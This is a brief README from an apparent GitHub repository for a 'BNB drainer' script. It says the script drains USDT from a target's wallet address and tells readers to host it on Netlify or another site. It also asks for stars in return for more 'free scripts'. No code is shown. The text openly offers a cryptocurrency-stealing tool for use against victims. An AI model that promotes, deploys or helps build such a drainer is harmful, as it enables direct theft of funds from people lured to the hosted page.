krishpandey135135-cell/bnb-drainer-no-obfuscation-/README.md

+PLEASE ADD STAR TO REPO IF YOU WANT MORE FREE SCRIPTS

 This script will let you drain usdt from the targets address

 go to https://www.netlify.com/ to host or host it on a regular site